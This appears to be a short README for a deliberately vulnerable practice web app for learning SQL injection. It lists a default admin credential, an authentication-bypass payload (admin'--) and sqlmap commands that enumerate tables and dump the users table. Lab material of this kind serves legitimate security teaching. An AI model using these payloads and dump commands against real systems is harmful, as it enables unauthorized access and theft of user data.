SQL Injection Web App For Practices and Learning Purpose
- Python 3.11 or Above
- Laptop
- Internet Connection
- Step.1: Type in Cmd
python3 sql.py
- Step.2 Open Browser And Type
yourip:5000
- Step.3 Admin Login Info
admin:admin123
- Step.4 Use Sql Payload
admin'--
any password
- Step.1: Capture Post Response and Create A File
req.txt
- Step.2 use Sqlmap for find tables
sqlmap --risk=3 --level=5 --tables --batch
- Step.3 Now final Dump Entire Databse
sqlmap --risk=3 --level=5 -T users --dump --batch
Check Out More Hacking Course
Made with ❤️ By Linuxndroid